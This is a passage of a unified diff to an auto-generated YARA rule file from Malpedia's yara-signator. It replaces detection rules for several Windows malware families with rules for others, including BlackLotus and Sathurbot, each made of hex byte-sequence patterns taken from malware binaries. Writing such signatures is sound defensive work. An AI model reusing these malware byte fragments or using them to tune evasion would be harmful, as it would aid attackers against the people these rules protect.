-		$sequence_1 = { 4b 8d3470 75ed 5b }
-		$sequence_2 = { ab 75d2 5f 5e 5b c3 }
-		$sequence_3 = { 7cf5 33c9 888f00010000 888f01010000 }
-		$sequence_4 = { 8b491c 83c60c 83c110 8945fc }
-		$sequence_5 = { 8d1c58 d3e0 0945f4 ff45f8 }
-		$sequence_6 = { c3 55 8bec 51 51 53 8d5f10 }
-		$sequence_7 = { 888f00010000 888f01010000 8bf7 8945f8 }
-		$sequence_8 = { 57 6a22 50 894608 ff15???????? }
-		$sequence_9 = { 034e3c b800030000 d3e0 33c9 6a02 }
-		$sequence_10 = { 56 57 b99a000000 8d7510 }
-		$sequence_11 = { e8???????? 83c40c 8d4580 50 8d4588 }
-		$sequence_12 = { 33c0 e9???????? 833d????????00 7405 e8???????? 83c8ff }
-		$sequence_13 = { ff75ec 0fb6843794010000 99 53 52 50 }
-		$sequence_14 = { 0145f0 6a00 6800010000 ff75ec 1155f4 53 }
-		$sequence_15 = { 5b 85ff 7415 0fb616 33d0 23d1 c1e808 }
-		$sequence_16 = { 50 ff7580 e8???????? 85c0 }
-		$sequence_17 = { 6a20 e8???????? 59 8bd8 }
-		$sequence_18 = { 59 59 33c0 e9???????? 8b35???????? 6a04 }
-		$sequence_19 = { 8bd7 c1ea03 53 0fb61e 33d8 23d9 c1e808 }
+		$sequence_0 = { 8b45f0 f7d0 2345f4 09d0 0345c4 0345ec }
+		$sequence_1 = { 7519 8b45c4 890424 e8???????? 8b45f4 8985f4fdffff e9???????? }
+		$sequence_2 = { 8b5510 83c20e 8b45ec c1e808 8802 8b5510 83c20f }
+		$sequence_3 = { 31c2 8b45e8 c1e808 0fb6c0 0fb680b0094100 }
+		$sequence_4 = { 8901 8b4df4 83c128 8b55f4 83c208 8b45f4 83c024 }
+		$sequence_5 = { 8d85a4fcffff ff00 8d85b8fdffff 890424 e8???????? 3985a4fcffff }
+		$sequence_6 = { c7042400000000 e8???????? 83ec0c 8d85b8fdffff 890424 e8???????? 8985a4fcffff }
+		$sequence_7 = { 8b45f4 8b00 c1e810 0fb6c0 8b0485e02f4100 8b1495e02b4100 31c2 }
+		$sequence_8 = { 09d0 0345a8 0345f4 2d885b9528 8945f4 8d45f4 c10007 }
+		$sequence_9 = { c1e818 0fb6c0 8b0485b01b4100 8b12 31c2 }
 
 	condition:
 		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Dented_Auto : FILE
+rule MALPEDIA_Win_Tetra_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ec077e48-e364-5ad2-b3eb-708d9cb96474"
+		id = "85991250-1047-5fcf-96eb-85da5fe13b43"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dented_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tetra_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tetra_loader_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "8a83542dc4cfbb6071fb1f2a2748ff19dad273e746a7625af72e8307d011702d"
+		logic_hash = "aeb4a8ec8acfdc787245eb94a88275106cbf235fc1e5fc83f04d972b90088a86"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123387,32 +123313,32 @@ rule MALPEDIA_Win_Dented_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? bf08020000 8d85ecfbffff 57 }
-		$sequence_1 = { c1e814 8b4dfc 5f 33cd }
-		$sequence_2 = { 8d55ff a1???????? 52 885dff 8d4810 }
-		$sequence_3 = { 8b35???????? 8d85f8feffff 50 8d85f4fdffff 50 ffd6 }
-		$sequence_4 = { 6a01 53 68???????? ffb5e8fbffff ff15???????? }
-		$sequence_5 = { e8???????? 8364242c00 8d4c2434 807d1c00 c74424300f000000 c644241c00 }
-		$sequence_6 = { 59 8bf0 8bcf 33c0 89b5e8f7ffff 2185f0f7ffff }
-		$sequence_7 = { 8b85f8f7ffff 8a8485fcfbffff 32c1 880416 8b8decf7ffff 43 42 }
-		$sequence_8 = { c21000 55 8bec 81ec18040000 a1???????? 33c5 8945fc }
-		$sequence_9 = { 5f 57 8d45b8 6a00 50 }
+		$sequence_0 = { 440fb74204 4181f074350000 4109c8 0f8480050000 3302 0fb74a04 81f174360000 }
+		$sequence_1 = { 66f7e6 0f8010010000 89c2 6601ea 410f92c6 31c0 81fdffff0000 }
+		$sequence_2 = { e8???????? 0f0b 4c8d059f8a0100 b901000000 4c89d2 e8???????? 0f0b }
+		$sequence_3 = { 4531db 81f9ffff0000 7715 6666666666662e0f1f840000000000 41bc03000000 4c89f2 }
+		$sequence_4 = { 7521 c6851717000000 488d8db8160000 488d154ce70200 e8???????? 488bb5c0160000 66c746023b00 }
+		$sequence_5 = { 48ffc7 4c89f0 4d89fb bd00000000 4885c0 0f856bffffff ebb4 }
+		$sequence_6 = { 488901 b001 f6c201 7513 488b4110 488b4820 488b4028 }
+		$sequence_7 = { 483b7df0 75bc eb8d 4489e1 83e11f 450fb64701 4183e03f }
+		$sequence_8 = { 4883c1fe 3d00010000 89d0 73a1 0fb64500 8845d0 0f2845e0 }
+		$sequence_9 = { 488b4de8 48c744243000000000 c744242880000000 c744242003000000 ba00000080 41b801000000 4531c9 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 847872
 }
-rule MALPEDIA_Win_Funksec_Auto : FILE
+rule MALPEDIA_Win_Xfsadm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9193fd51-0ac6-5db6-9635-e6eb925df3d1"
+		id = "4e0da958-d7db-5cd3-9845-58c1ee1ba55b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.funksec"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.funksec_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xfsadm_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "06f95012988e8bb48797f6f8504bd1b10c3653d29a2d1e0983bf3fe910630ecb"
+		logic_hash = "b8085f6961208dfb9003a24568de62da647e6cb5e982bfeaf61525cbc63ec421"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123426,32 +123352,32 @@ rule MALPEDIA_Win_Funksec_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4c8bb550020000 440fb68d58020000 48b80a00000000000080 4939c6 0f85a9020000 4489e1 }
-		$sequence_1 = { e8???????? 66c7060101 c7460401000000 488d05b2591e00 48894608 48c7461001000000 0f57c0 }
-		$sequence_2 = { e9???????? 488b8528110000 48898520110000 4c8d0564cf2c00 ba80000000 e8???????? e9???????? }
-		$sequence_3 = { ba21000000 e8???????? 488d0ddb081100 4c8d056c091100 ba1f000000 e8???????? 488d0d73091100 }
-		$sequence_4 = { e8???????? 84c0 89fb 0f84f6000000 488b0d???????? 488b4138 4885c0 }
-		$sequence_5 = { e9???????? 4489f0 83e01f 410fb65701 83e23f 4180fedf 7664 }
-		$sequence_6 = { e9???????? 488d05f6d11400 488985a0000000 48c785a800000001000000 48c785b000000008000000 0f57c0 0f1185b8000000 }
-		$sequence_7 = { e8???????? ebde 498b07 4885c0 0f84c3010000 48c1e003 488d1440 }
-		$sequence_8 = { e8???????? 4c8bad30360000 4d8db518010000 41b828030000 4c89f1 4889da e8???????? }
-		$sequence_9 = { ebd0 49ffc3 49ffc9 4d8918 4d894808 488d05cdf81000 488945d8 }
+		$sequence_0 = { 740f 83f8fe 740a 6bce38 030c95f8d84200 f6412d01 7414 }
+		$sequence_1 = { 8d7301 80fa78 7577 385903 }
+		$sequence_2 = { 895e04 eb03 8b5e04 893c83 ff4634 }
+		$sequence_3 = { 83c404 8b5d0c c7461000000000 c7461400000000 c7461800000000 8d4b01 8a03 }
+		$sequence_4 = { 6a03 6808020000 ff15???????? 68???????? ff75e0 ff75dc }
+		$sequence_5 = { 8b12 8b42f8 2b4afc 2bc7 0bc8 }
+		$sequence_6 = { 894df0 83c104 50 e8???????? 8bf8 85ff 0f84cb000000 }
+		$sequence_7 = { a3???????? 85c0 0f8475010000 68???????? ff35???????? ffd6 a3???????? }
+		$sequence_8 = { 8b7b20 8b7324 6a00 ff10 8b06 8bce 53 }
+		$sequence_9 = { f20f593c85604f4200 660f122c85604f4200 03c0 660f28348570534200 }
 
 	condition:
-		7 of them and filesize < 10986496
+		7 of them and filesize < 566272
 }
-rule MALPEDIA_Win_Thumbthief_Auto : FILE
+rule MALPEDIA_Win_Blacklotus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c9938a2-b3ca-5fff-a79c-43d76c2643f6"
+		id = "6d41c095-e739-5655-a8fc-e5651a304950"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thumbthief_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blacklotus_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "95f6f620d5e728800926363598aae4fbd4980628ff69ddd3ce6426d2d79b4cfc"
+		logic_hash = "69ee2c520b98a8fc48e03d945b290dd8e5b47d8c94f1557274f7c175df20640a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123465,34 +123391,34 @@ rule MALPEDIA_Win_Thumbthief_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7604 e8???????? 83c410 895e04 5f 8bc6 5e }
-		$sequence_1 = { ff7010 e8???????? 0fb74612 8d4dc8 50 68???????? e8???????? }
-		$sequence_2 = { e8???????? c645fc03 85f6 7526 68???????? 68???????? 8d8d2cffffff }
-		$sequence_3 = { e8???????? 8d742440 8d7c2414 a5 8d442414 6a01 50 }
-		$sequence_4 = { e9???????? 8b542434 395608 8b542428 0f85b1000000 8b4c2430 898c24c0000000 }
-		$sequence_5 = { e8???????? 8d8c24bc010000 e8???????? 8d4314 50 68a0000000 53 }
-		$sequence_6 = { ff15???????? 68???????? ff75dc ffd7 50 8d8dd8feffff e8???????? }
-		$sequence_7 = { ff248580c94200 8b4508 b901000000 6689481c 33c0 5f 5e }
-		$sequence_8 = { f20f1045c4 83c408 f20f1187b8010000 8bc6 5f 5e 5b }
-		$sequence_9 = { ff75f4 e8???????? 83c414 8bd6 8bcb e8???????? 837d1000 }
+		$sequence_0 = { 884102 488d4904 4983e801 75dc 428d149dfcffffff 460fb60412 8d4201 }
+		$sequence_1 = { 7507 488b4b38 c601c3 488b1b 483bdf }
+		$sequence_2 = { 4883c104 e8???????? 488b4d30 0fb65103 0fb64102 48c1e208 }
+		$sequence_3 = { 44884301 88430b e8???????? 4c8bc6 488bd3 408acf }
+		$sequence_4 = { 2bcf ffc7 4103c9 6633544d08 8d41ff 6689544508 }
+		$sequence_5 = { 408a7c3c30 428d149de0ffffff 46320412 8d4201 }
+		$sequence_6 = { 4883ec30 418be8 488bfa 488bf1 488d15d41a0100 488b0d???????? }
+		$sequence_7 = { 7508 4d85c0 75ea 33c0 c3 1bc0 }
+		$sequence_8 = { ffc8 03c3 44888430d8070000 453bd1 72b9 8b15???????? ffca }
+		$sequence_9 = { 4c8d054e140100 488bd7 488bd8 e8???????? 488b05???????? }
 
 	condition:
-		7 of them and filesize < 4235264
+		7 of them and filesize < 181248
 }
-rule MALPEDIA_Win_Andromut_Auto : FILE
+rule MALPEDIA_Win_Beepservice_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "deb4a424-4b4e-5ea2-908f-5ddc5f18ef00"
+		id = "c4c53131-cb7f-5347-a9b9-cf736a2ce9c3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.andromut_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.beepservice_auto.yar#L1-L282"
 		license_url = "N/A"
-		logic_hash = "230945b6168ef420f0744200cbf464e2eea8368844f9caec3ac8e73f949cddb4"
+		logic_hash = "689010a7eaeffaf34a3ec3394a2430b997d2d5b1ebae027e3c89a6f3e221798c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -123504,34 +123430,53 @@ rule MALPEDIA_Win_Andromut_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d8da0dfffff 51 6819000200 56 8d4da4 51 }
-		$sequence_1 = { 47 3bfb 72e9 8b75fc 8b45f8 8b7c1018 33db }
-		$sequence_2 = { 8d8db8f9ffff 51 8d8d70f9ffff 51 57 57 }
-		$sequence_3 = { 53 51 ffb5a0f7ffff 8d8590f7ffff b92d57ae5b 0f438590f7ffff }
-		$sequence_4 = { 8a4d08 8d41bf 3c19 7708 0fbed1 83ea41 eb34 }
-		$sequence_5 = { 8d44246c b974723dc5 50 8d84247c030000 50 e8???????? }
-		$sequence_6 = { 49 8bc1 c1e10b c1e805 25ff070000 0bc1 }
-		$sequence_7 = { 8b9d70ffffff 8b856cffffff 03df a801 7415 6aff }
-		$sequence_8 = { b802210000 6689443e16 0fb7443e06 8b75f8 }
-		$sequence_9 = { e8???????? 8be5 5d c3 68c8060000 b8???????? e8???????? }
+		$sequence_0 = { 8b0d???????? 68???????? ffd6 8bc8 }
+		$sequence_1 = { ffd6 8bc8 ff15???????? 50 ff15???????? }
+		$sequence_2 = { 683f000f00 6a00 68???????? ff15???????? }
+		$sequence_3 = { e8???????? 83f801 7505 e8???????? 68???????? 68???????? }
+		$sequence_4 = { 7512 6888130000 68???????? e8???????? 83c408 }
+		$sequence_5 = { 83c408 e9???????? 68???????? e8???????? 83c404 6a00 6a00 }
+		$sequence_6 = { 8d85fcfdffff 56 56 6a02 56 56 }
+		$sequence_7 = { 6a20 57 bf???????? 57 }
+		$sequence_8 = { 68???????? e8???????? ff7608 e8???????? 83c40c }
+		$sequence_9 = { ff7614 e8???????? 50 ff7614 57 e8???????? 83c42c }
+		$sequence_10 = { 6a02 50 55 e8???????? ff7610 e8???????? 50 }
+		$sequence_11 = { e8???????? 83c444 8d442410 6a02 }
+		$sequence_12 = { 85f6 7403 56 ffd7 53 ffd7 5f }
+		$sequence_13 = { b90a000000 a3???????? bf???????? a3???????? }
+		$sequence_14 = { 8b5c240c 8b3d???????? 85f6 7403 }
+		$sequence_15 = { 741e 45 83fd0a 7ce0 eb23 ff15???????? }
+		$sequence_16 = { ffd7 8d442414 50 56 }
+		$sequence_17 = { c785f8fdffff00240000 6a00 8d95f4fdffff 52 8b85f8fdffff 50 }
+		$sequence_18 = { 83f81e 720a b801000000 e9???????? 8b450c 8b480c }
+		$sequence_19 = { 8b85f8fdffff 50 68???????? 8b8dfcfdffff 51 ff15???????? }
+		$sequence_20 = { 8b5108 52 68???????? e8???????? 83c40c 6a02 }
+		$sequence_21 = { 50 e8???????? 83c404 c3 6a00 6a00 }
+		$sequence_22 = { a1???????? 85c0 746b a1???????? 85c0 7562 }
+		$sequence_23 = { 48 83f804 0f8795000000 ff248548144000 6888130000 6a01 6a00 }
+		$sequence_24 = { 85c9 668935???????? 7e15 b299 8a9874304000 32da }
+		$sequence_25 = { 83c414 e8???????? 6a00 6a00 b907000000 6a00 }
+		$sequence_26 = { 57 33f6 8975d8 8975e0 8975e4 8975dc 8975fc }
+		$sequence_27 = { 83c404 c3 8b0d???????? 6aff 51 }
+		$sequence_28 = { 6a03 e8???????? 83c414 e9???????? a1???????? }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Darkpulsar_Auto : FILE
+rule MALPEDIA_Win_Edam_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3d640e6f-45ff-5f50-abb3-96bc1483119a"
+		id = "f4028c21-33b6-5e9f-a37a-2699bc732d08"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkpulsar_auto.yar#L1-L456"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.edam"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.edam_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "e92897322c1f7ba92ed602b9b405ecfc3237bf769ff600554b34202d8fb12746"
+		logic_hash = "62aff47bf3ddbcb69a86cf1dabc7a43bddd2da8a74c7bd24c0bccdeef4523386"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -123543,71 +123488,32 @@ rule MALPEDIA_Win_Darkpulsar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c21000 ff25???????? ff25???????? ff25???????? 33c0 40 }
-		$sequence_1 = { 33c0 40 c20c00 68???????? 64ff3500000000 }
-		$sequence_2 = { 3a01 1bc0 83e0fe 40 }
-		$sequence_3 = { 8b35???????? 57 8b7d08 eb09 803f00 }
-		$sequence_4 = { ffd6 8bd8 8b450c 0fbe00 50 ffd6 }
-		$sequence_5 = { ffd6 59 59 3bd8 74e0 }
-		$sequence_6 = { 47 ff450c 0fbe07 50 ffd6 8bd8 8b450c }
-		$sequence_7 = { 3bd8 74e0 0fb607 8b4d0c 3a01 }
-		$sequence_8 = { 5e c9 c3 56 8b742408 85f6 7412 }
-		$sequence_9 = { ff75fc ff75f4 e8???????? 59 59 83f8ff }
-		$sequence_10 = { 33d2 56 57 33c0 }
-		$sequence_11 = { 8d45cc 50 57 e8???????? 83c410 85c0 }
-		$sequence_12 = { ffd7 59 5f 5e c3 8b4c2404 }
-		$sequence_13 = { 50 ff7618 ff15???????? 59 59 85c0 }
-		$sequence_14 = { 8945fc 8b450c 53 8b5d08 56 57 8945e8 }
-		$sequence_15 = { 83c410 83f8ff 0f95c1 49 8bc1 }
-		$sequence_16 = { 59 1bc0 59 40 c3 e9???????? }
-		$sequence_17 = { 6a01 ff15???????? 8bf0 59 59 3bf7 }
-		$sequence_18 = { 33d2 c3 8bff 55 8bec b863736de0 }
-		$sequence_19 = { 53 8b5d10 56 8b7508 33d2 }
-		$sequence_20 = { 56 e8???????? 59 85c0 7625 }
-		$sequence_21 = { 8d4601 6a01 50 ff15???????? 8bf8 }
-		$sequence_22 = { eb03 83c8ff 5f 5e c3 56 }
-		$sequence_23 = { 59 5e 8b45fc c9 c3 }
-		$sequence_24 = { e8???????? 8bf0 46 56 ff15???????? 59 59 }
-		$sequence_25 = { e8???????? 59 5e 83f8ff }
-		$sequence_26 = { 5f 5e c3 8b442404 85c0 7503 }
-		$sequence_27 = { 56 57 8b7d10 7e05 83c220 eb03 }
-		$sequence_28 = { 6a7f 58 33f6 83e107 46 d3e6 85f0 }
-		$sequence_29 = { 8bf8 85ff 750f 50 50 8d45f4 }
-		$sequence_30 = { 50 ffd7 f6450801 5f 7409 56 e8???????? }
-		$sequence_31 = { 33ff 895dfc 3bc7 7509 8b0b }
-		$sequence_32 = { e8???????? 83c40c 83f8ff 740e ff75e4 ff15???????? }
-		$sequence_33 = { eb28 57 8d45f4 56 50 e8???????? }
-		$sequence_34 = { ff742410 ff742410 ff15???????? 33c9 }
-		$sequence_35 = { c20400 8b4508 8b10 8b4008 8d4e08 51 }
-		$sequence_36 = { 8b7d08 837f3c04 7405 33c0 5f 5d }
-		$sequence_37 = { 8b7d14 8975f4 3b37 7734 8b750c }
-		$sequence_38 = { ff25???????? c3 8b442404 c705????????00102500 c705????????10102500 }
-		$sequence_39 = { 56 ff15???????? 83f8ff 7433 33c0 }
-		$sequence_40 = { 0f841b010000 3bf0 0f8413010000 394708 0f840a010000 894608 }
-		$sequence_41 = { 8b442408 884101 c1e808 8801 8d4102 }
-		$sequence_42 = { ddd9 f6c444 7b09 ddd8 b8???????? eb5b 51 }
-		$sequence_43 = { 33ff 8945f4 8945f8 e8???????? 83c404 8945fc }
-		$sequence_44 = { 8945fc bacdab0000 8d45f4 52 50 }
-		$sequence_45 = { 894588 7404 40 894588 83659800 85c0 0f8610010000 }
-		$sequence_46 = { 00db 7309 7515 8a1e }
-		$sequence_47 = { 85f6 7425 3b4d10 0f8394010000 8b7514 }
-		$sequence_48 = { e8???????? dc1d???????? 83c410 dfe0 f6c444 }
+		$sequence_0 = { 83c8ff eb1e 8b45fc 3bd6 8b0c8560b74500 0f95c0 02c0 }
+		$sequence_1 = { 50 8d45b0 8955d8 50 e8???????? 8d45b0 50 }
+		$sequence_2 = { 8bc1 83e13f c1f806 6bc930 8b048560b74500 f644082801 7406 }
+		$sequence_3 = { 40 c745ec603c4200 894df8 8945fc 64a100000000 8945e8 }
+		$sequence_4 = { 8bd1 8b42e8 8d72e8 8b4004 c74410e818654400 8b06 8b4804 }
+		$sequence_5 = { 50 6a01 8d4dd4 e8???????? 68???????? 8d45d4 c745d4c0634400 }
+		$sequence_6 = { 8b45f0 894df4 8b048560b74500 c644022a0a 0f8484000000 }
+		$sequence_7 = { 8d8d08fdffff c785b4fdffff0f000000 c785b0fdffff00000000 c685a0fdffff00 e8???????? 8b859cfdffff }
+		$sequence_8 = { 6a55 ff34f5788a4400 ff7508 e8???????? 83c40c 85c0 }
+		$sequence_9 = { 3bc6 7353 807d8600 8a88a87c4400 8b857cffffff 8808 }
 
 	condition:
-		7 of them and filesize < 491520
+		7 of them and filesize < 807936
 }
-rule MALPEDIA_Win_Snifula_Auto : FILE
+rule MALPEDIA_Win_Sathurbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "afa48786-d5fc-5366-8008-6b70f692e7c3"
+		id = "40f6d317-e340-5c28-bf05-1e34ed3b7c05"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snifula_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sathurbot_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7c279f7057df8c5886f1d459f9399bd6a55001fc2186a62b783d87332b8a3375"
+		logic_hash = "73420e104486f36b90bb2733cf04075c1d18a3e103b83a2dc2d22ad64ff4f0ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123621,32 +123527,32 @@ rule MALPEDIA_Win_Snifula_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 33f6 8d936c0e0000 6a05 58 50 56 }
-		$sequence_1 = { 57 8d4c2420 e8???????? 8bd8 3bdd 7524 57 }
-		$sequence_2 = { 40 8907 8d442414 50 56 56 8d7904 }
-		$sequence_3 = { 7436 8b4728 a820 7416 ff7710 8b4708 }
-		$sequence_4 = { 8345ec04 3b45e8 7295 eb1b 8b4df8 8b45f4 8b0488 }
-		$sequence_5 = { bf???????? 57 53 ff15???????? 8bf0 85f6 7414 }
-		$sequence_6 = { 7602 8bf0 8b4d10 6a00 56 ff7508 e8???????? }
-		$sequence_7 = { 8bf8 ff35???????? 8b35???????? ffd6 53 89442414 }
-		$sequence_8 = { 6a04 8d45fc 50 6a04 56 68???????? ff7508 }
-		$sequence_9 = { 5e 5b c9 c20400 8d4804 ba1e010000 56 }
+		$sequence_0 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b84b7e8b0c 0f45c3 }
+		$sequence_1 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 bfcc456d5f b8dd72d480 }
+		$sequence_2 = { e9???????? 81fe44b0cddc 7f16 81fe7313fbac 0f850dffffff be80c3aea4 e9???????? }
+		$sequence_3 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8d1e835c1 b93dd672c9 }
+		$sequence_4 = { ebd8 81fa06cfb547 7f27 81fab0570bce 7f30 81fabe1990c9 75c2 }
+		$sequence_5 = { ebfe 55 89e5 53 56 83ec02 a1???????? }
+		$sequence_6 = { eb3e 897c2408 8b450c 89442404 893424 e8???????? 8945f0 }
+		$sequence_7 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8aebf6a24 0f45c3 }
+		$sequence_8 = { e9???????? c744240400000000 c7042401000000 89f1 e8???????? 83ec08 8b442454 }
+		$sequence_9 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b86e66c620 b9a93409fe }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 2727936
 }
-rule MALPEDIA_Win_Pterois_Auto : FILE
+rule MALPEDIA_Win_Minibike_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3320c746-a1fd-5d65-8bd9-a08cf7741ea4"
+		id = "b4e41190-0fa0-5a7c-a07b-bb3addd5d6da"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pterois"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pterois_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibike"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minibike_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "40d01f41f8c6ab0bf9862ea3d2722b533235ff4ec8c712399aa15cc1e9f9196b"
+		logic_hash = "d63c47c9b294af645af17048597f95704ec7db4dff6a776da81f783cf994a29a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123660,32 +123566,32 @@ rule MALPEDIA_Win_Pterois_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f82ff620000 4981f800001800 730d 4981f800200000 0f83c9620000 c5fe6f02 c4a17e6f6c02e0 }
-		$sequence_1 = { 33c9 4c8d057c180100 488d154d6a0100 e8???????? 4885c0 7415 49ba7030525e472705d3 }
-		$sequence_2 = { c744243000000000 8b442430 89442424 488b4c2440 4831e1 e8???????? 8b442424 }
-		$sequence_3 = { 75dd 488d055b500100 483bd8 74d1 488bcb e8???????? ebc7 }
-		$sequence_4 = { c7401808000000 488b4c2468 488d442470 4829c1 488b442458 48034810 }
-		$sequence_5 = { 4829c4 8b842498100000 8b842490100000 488b05???????? 4831e0 4889842460100000 4c894c2458 }
-		$sequence_6 = { 48890d???????? e8???????? 4c8d0d91ce0100 4c8bc0 b201 b9fdffffff e8???????? }
-		$sequence_7 = { e8???????? 488b05???????? 4889442430 488d8c24600c0000 e8???????? 4889c1 }
-		$sequence_8 = { e8???????? 83f800 0f851c000000 488b05???????? 488b4c2440 }
-		$sequence_9 = { e8???????? 4889442420 48837c242000 0f840c000000 488b442420 c7401802000000 488b442420 }
+		$sequence_0 = { 6a00 0f434520 6800008004 6a00 6a00 6a00 51 }
+		$sequence_1 = { 2bc2 3bc8 0f8758010000 8d040a 8bce 3bc6 0f43c8 }
+		$sequence_2 = { 75bd 8b5508 8b451c 83f810 7227 8d4801 8bc2 }
+		$sequence_3 = { 8975b4 a801 742b e8???????? 6a00 c7461000000000 8bce }
+		$sequence_4 = { 8985b4fdffff 51 0f57c0 c785ecfdffff00000000 8d8588fdffff 660fd685e4fdffff 0f2805???????? }
+		$sequence_5 = { 2bc6 8bbda4feffff c1f802 898decfcffff 8985f8fcffff 85c0 7441 }
+		$sequence_6 = { 8b85c8fdffff 33c9 8bb5c4fdffff 2bc6 8bbdd0fdffff c1f802 898df4fcffff }
+		$sequence_7 = { c7431000000000 c7431407000000 85c0 7568 50 68???????? 8bcb }
+		$sequence_8 = { eb06 8b95acfcffff 83fa08 7235 8b8d98fcffff 8d145502000000 8bc1 }
